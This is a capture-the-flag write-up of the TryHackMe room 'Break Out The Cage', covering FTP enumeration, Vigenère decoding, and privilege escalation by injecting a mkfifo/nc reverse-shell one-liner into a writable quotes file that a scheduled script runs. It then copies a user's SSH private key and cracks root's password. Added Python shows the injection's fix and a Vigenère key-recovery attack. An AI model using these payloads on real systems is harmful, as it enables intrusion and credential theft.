TryHackMe: Break Out The Cage
Break Out The Cage was a simple yet fun room. It was very direct about what it wanted, and although I took a different approach from most of the write-ups I found, I got to the same result in the end on my own. That is really positive: there usually isn't one correct way to do a room. As long as you do it in a way you are comfortable with and understand, you'll get where you want to go.
https://tryhackme.com/room/breakoutthecage1
Initial Enumeration
Nmap Scan
We start with our nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap 10.10.174.197 && nmap -T4 -n -sC -sV -Pn -p- --min-rate 1000 --max-retries 3 10.10.174.197
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-31 17:57 BST
Warning: 10.10.174.197 giving up on port because retransmission cap hit (3).
Nmap scan report for 10.10.174.197
Host is up (0.080s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 396 May 25 2020 dad_tasks
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:-
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
| 256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|_ 256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.93 seconds
FTP
Nmap's ftp-anon script shows that anonymous login is allowed and that the FTP root contains a file called dad_tasks. Logging in as anonymous and downloading it to our machine, we find that the file holds some encoded text:
UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds
Decoding it as base64 works, but what comes out still has its letters scrambled:
Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
The decoded text keeps its word lengths, capitalisation and punctuation, so this is a substitution cipher rather than a transposition, and the realistic options are a Caesar shift or Vigenère. A single Caesar shift is ruled out as soon as you compare with the plaintext below: the word THE is enciphered three different ways (XZW, TTI and LAA), which is exactly what a polyalphabetic cipher such as Vigenère produces. On dcode.fr, the "automatic decryption" option for the Vigenère cipher recovers the key and gives us the decoded text:
Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.
In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes
Web 80
We get what seems to be a password, but no username to use it with. To find one, we go to the web page on port 80:
Shell as weston
On the home page we see some text about the website and who is running it, and it becomes clear that the password we found belongs to weston. With that, we can log in via ssh:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh weston@10.10.174.197
weston@10.10.174.197's password:
weston@national-treasure:~$
Enumerating as weston we couldn't find much, but while looking around, random messages start appearing in our shell:
Broadcast message from cage@national-treasure (somewhere) (Mon Mar 31 17:12:01
“Youll be seeing a lot of changes around here. Papas got a brand new bag.” — Face/Off
Shell as cage
Broadcast messages from the user cage showing up every so often is a bit suspicious, so we look for files that belong to cage's group:
weston@national-treasure:/$ find / -group cage 2>/dev/null
/home/cage
/opt/.dads_scripts
/opt/.dads_scripts/spread_the_quotes.py
/opt/.dads_scripts/.files
/opt/.dads_scripts/.files/.quotes
We found the script responsible for the periodic messages, and its source code contains something even more interesting:
weston@national-treasure:/opt/.dads_scripts$ cat spread_the_quotes.py
#!/usr/bin/env python
#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random
lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)
There are no checks whatsoever. os.system() hands its string to /bin/sh -c, so whatever is in the .quotes file is interpreted as shell syntax and run by whoever runs the script, which the broadcasts tell us is cage. Since we have write permission on .quotes, all we have to do is replace its contents with a reverse shell to get access as cage. The first step is to write the payload into the .quotes file:
weston@national-treasure:/opt/.dads_scripts$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc - 4444 >/tmp/f" > .files/.quotes
Then we start a listener on our machine and wait for the script to run again. The first segment becomes "wall rm /tmp/f", which wall simply complains about; everything after the first semicolon runs as cage:
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.174.197] 51342
bash: cannot set terminal process group (1728): Inappropriate ioctl for device
bash: no job control in this shell
cage@national-treasure:~$
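The root cause of that foothold is worth seeing side by side with its fix. The Python below is an added example, not the room's script: it rebuilds the "wall " + quote construction, runs it the way os.system() does (through /bin/sh -c) and then the way it should be run (an argv list, no shell), and adds the ownership and permission check on the quotes file that would have rejected weston's edit. echo stands in for wall so the example runs without a terminal to broadcast to; that substitution, the sample quote text and the temporary files are assumptions of this example, not from the room.

```python
import os
import stat
import subprocess
import tempfile

# spread_the_quotes.py calls `wall`; there is no terminal to broadcast to in a
# test environment, so `echo` stands in for it here (an assumption of this
# example). How the shell treats the argument is identical either way.
BROADCAST = "echo"


def vulnerable_broadcast(quote: str) -> str:
    """Same construction as the room's script: "wall " + quote handed to
    os.system(), which runs it through /bin/sh -c. Any ; | $( ) or backtick in
    the quote is shell syntax, so the quotes file is effectively a script."""
    cmd = BROADCAST + " " + quote
    # shell=True is what os.system() does internally.
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


def hardened_broadcast(quote: str) -> str:
    """Fixed form: pass argv as a list and never start a shell. The whole quote
    is delivered as a single argument, metacharacters included."""
    result = subprocess.run([BROADCAST, quote], capture_output=True, text=True)
    return result.stdout


def quotes_file_is_trusted(path: str) -> bool:
    """Second fix: refuse a quotes file that anyone other than the running user
    could have edited. weston was able to overwrite .quotes even though the
    script ran as cage; a file in that state fails this check."""
    st = os.stat(path)
    if st.st_uid != os.geteuid():
        return False
    return not (st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def file_check_demo() -> tuple:
    """Create two throwaway quotes files (constructed sample data), one
    group-writable and one owner-only, and return
    (trusted(group_writable), trusted(owner_only))."""
    with tempfile.TemporaryDirectory() as d:
        loose = os.path.join(d, ".quotes_loose")
        tight = os.path.join(d, ".quotes_tight")
        for p in (loose, tight):
            with open(p, "w") as f:
                f.write("Youll be seeing a lot of changes around here.\n")
        os.chmod(loose, 0o664)  # rw-rw-r--: the group can edit it
        os.chmod(tight, 0o644)  # rw-r--r--: only the owner can edit it
        return quotes_file_is_trusted(loose), quotes_file_is_trusted(tight)


if __name__ == "__main__":
    # Constructed payload: a harmless second command after the semicolon.
    payload = "Papas got a brand new bag; echo INJECTED"
    print("os.system style :", repr(vulnerable_broadcast(payload)))
    print("argv-list style :", repr(hardened_broadcast(payload)))
    print("file check      :", file_check_demo())
```

Run it and the first line shows the second command executing, while the second line shows the same text arriving as one inert argument. The permission check is the defence-in-depth half: even with shell=False, a scheduled script that reads a file other users can write is still letting them choose its input.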
Inside cage's home directory we find a .ssh folder. To get a better and more stable shell, we copy the id_rsa key to our machine and log in as cage via ssh:
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh -i id_rsa cage@10.10.174.197
cage@national-treasure:~$
We can also get the user flag from the only regular file in cage's home directory:
cage@national-treasure:~$ ls -la
total 56
drwx------ 7 cage cage 4096 May 26 2020 .
drwxr-xr-x 4 root root 4096 May 26 2020 ..
lrwxrwxrwx 1 cage cage 9 May 26 2020 .bash_history -> /dev/null
-rw-r--r-- 1 cage cage 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 cage cage 3771 Apr 4 2018 .bashrc
drwx------ 2 cage cage 4096 May 25 2020 .cache
drwxrwxr-x 2 cage cage 4096 May 25 2020 email_backup
drwx------ 3 cage cage 4096 May 25 2020 .gnupg
drwxrwxr-x 3 cage cage 4096 May 25 2020 .local
-rw-r--r-- 1 cage cage 807 Apr 4 2018 .profile
-rw-rw-r-- 1 cage cage 66 May 25 2020 .selected_editor
drwx------ 2 cage cage 4096 May 26 2020 .ssh
-rw-r--r-- 1 cage cage 0 May 25 2020 .sudo_as_admin_successful
-rw-rw-r-- 1 cage cage 230 May 26 2020 Super_Duper_Checklist
-rw------- 1 cage cage 6761 May 26 2020 .viminfo
cage@national-treasure:~$ cat Super_Duper_Checklist
1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: THM{REDACTED}
Shell as root
We also see a directory called email_backup containing backups of 3 emails. Emails 1 and 2 don't have anything useful, but email 3 has another encoded string, and this time some hints to go with it:
cage@national-treasure:~/email_backup$ cat email_3
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.com
Hey Son
Buddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote down what it said. Could you look into it please? I think it could be something to do with hisaccount on here. I want to know what he's hiding from me... I might need a new agent. Pretty sure he's out to get me. The note said:
haiinspsyanileph
The guy also seems obsessed with my face lately. He came him wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldnt be able to FACE that!!
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd.
Regards
The Legend - Cage
After the encoded text the email leans heavily on the word face, and since the last note was Vigenère, we try the same cipher again, this time with face as the key. The output, again, looks like some sort of password. We try it as root's password and get in:
cage@national-treasure:/home$ su root
Password:
root@national-treasure:/home#
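Both decryptions in this room (the dad_tasks note through dcode.fr's automatic mode, and Sean's note with the key face) are ordinary Vigenère. The Python below is an added example, not part of the original write-up or of dcode.fr: vigenere() encrypts or decrypts with a key that advances only on letters and leaves everything else untouched (assumed here to match dcode.fr's default, which is consistent with the decoded note keeping its spacing and punctuation), and recover_key() does by known plaintext what the automatic mode did for us by statistics: subtract a crib from the ciphertext to get the key stream, then take its shortest repeating period. Running it on the first line of dad_tasks with the decoded first line as the crib recovers the room's 11-letter key, and a crib of only the first few words is already enough, because it is longer than one key period. The only inputs are the strings quoted earlier on this page.

```python
import string
from itertools import cycle

ALPHABET = string.ascii_lowercase


def _is_letter(ch: str) -> bool:
    # Only ASCII letters take part; accented or other characters pass through.
    return ch in string.ascii_letters


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Vigenère encrypt (or, with decrypt=True, decrypt) `text` under `key`.

    Letters are shifted and consume one key letter each; every other character
    is copied unchanged without advancing the key. Case of the text is kept.
    """
    key = key.lower()
    if not key or any(k not in ALPHABET for k in key):
        raise ValueError("key must be one or more ASCII letters")
    shifts = cycle(ALPHABET.index(k) for k in key)
    out = []
    for ch in text:
        if not _is_letter(ch):
            out.append(ch)
            continue
        base = ord("A") if ch.isupper() else ord("a")
        shift = next(shifts)
        if decrypt:
            shift = -shift
        out.append(chr((ord(ch) - base + shift) % 26 + base))
    return "".join(out)


def recover_key(ciphertext: str, crib: str) -> str:
    """Known-plaintext attack on Vigenère.

    `crib` is plaintext known or guessed to sit at the start of `ciphertext`.
    Subtracting crib letters from ciphertext letters yields the key stream;
    the key is that stream's shortest repeating period. If the crib is shorter
    than one full period, the whole stream is returned and should be treated
    as only a prefix of the key.
    """
    stream = []
    for c, p in zip(ciphertext, crib):
        if _is_letter(c) and _is_letter(p):
            diff = (ALPHABET.index(c.lower()) - ALPHABET.index(p.lower())) % 26
            stream.append(ALPHABET[diff])
        elif _is_letter(c) or _is_letter(p):
            # A letter lined up against punctuation: the crib is misaligned.
            raise ValueError("crib does not line up with the ciphertext")
    stream = "".join(stream)
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


if __name__ == "__main__":
    # Strings exactly as they appear in the write-up above.
    dad_tasks_line1 = "Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!"
    decoded_line1 = "Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!"
    sean_note = "haiinspsyanileph"

    key = recover_key(dad_tasks_line1, decoded_line1)
    print("recovered key :", key)
    print("short crib    :", recover_key(dad_tasks_line1[:21], decoded_line1[:21]))
    print("decrypted     :", vigenere(dad_tasks_line1, key, decrypt=True))
    print("sean's note   :", vigenere(sean_note, "face", decrypt=True))
```

Because the key advances only on letters, the same key stream continues across line breaks, which is why the whole multi-line note decrypts with one key and why a crib taken from the first line is enough to recover it.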
Now all that's left is the root flag, which is again inside a directory called email_backup, but this time the flag is in email number 2:
root@national-treasure:~/email_backup# cat email_2
From - master@ActorsGuild.com
To - SeanArcher@BigManAgents.com
Dear Sean
I'm very pleased to here that Sean, you are a good disciple. Your power over him has become
strong... so strong that I feel the power to promote you from disciple to crony. I hope you
don't abuse your new found strength. To ascend yourself to this level please use this code:
THM{REDACTED}
Thank you
Sean Archer